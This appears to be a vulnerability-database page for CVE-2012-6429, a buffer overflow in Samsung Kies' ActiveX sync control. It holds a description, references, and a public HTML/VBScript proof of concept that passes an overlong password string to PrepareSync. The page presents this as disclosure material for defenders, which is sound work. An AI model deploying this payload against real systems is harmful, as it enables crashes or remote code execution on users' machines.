CVE-2012-6429
Description
Buffer overflow in the PrepareSync method in the SyncService.dll ActiveX control in Samsung Kies before 2.5.1.12123_2_7 allows remote attackers to execute arbitrary code via a long string to the password argument.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Samsung Kies - Remote Buffer Overflow
source: https://www.securityfocus.com/bid/57249/info
Samsung Kies is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer.
Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition.
<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title>Remote Buffer Overflow Vulnerability in Samsung Kies v.
2.5.0.12114_1 </title>
</head>
<script language='vbscript'>
Sub PoC()
arg1="defaultV"
arg2=String(14356, "A")
arg3=1
arg4=1
Target.PrepareSync arg1 ,arg2 ,arg3 ,arg4
End Sub
</script>
<body>
<h3>Remote Buffer Overflow Vulnerability in Samsung Kies by High-Tech
Bridge Security Research Lab</h3>
<input language=VBScript onclick=PoC() type=button value="Proof of
Concept">
</body>
<object
classid='clsid:EA8A3985-F9DF-4652-A255-E4E7772AFCA8'id='Target'></object>
</html>Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| samsung | kies | {"endIncluding":"2.5.0.12114_1"} | |
References
- http://archives.neohapsis.com/archives/bugtraq/2013-01/0036.html
- http://osvdb.org/89118
- http://packetstormsecurity.com/files/119423/Samsung-Kies-2.5.0.12114_1-Buffer-Overflow.html
- http://www.securityfocus.com/bid/57249
- https://exchange.xforce.ibmcloud.com/vulnerabilities/81160
- https://www.htbridge.com/advisory/HTB23136
- http://archives.neohapsis.com/archives/bugtraq/2013-01/0036.html
- http://osvdb.org/89118
- http://packetstormsecurity.com/files/119423/Samsung-Kies-2.5.0.12114_1-Buffer-Overflow.html
- http://www.securityfocus.com/bid/57249
- https://exchange.xforce.ibmcloud.com/vulnerabilities/81160
- https://www.htbridge.com/advisory/HTB23136
CWEs
CWE-119
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.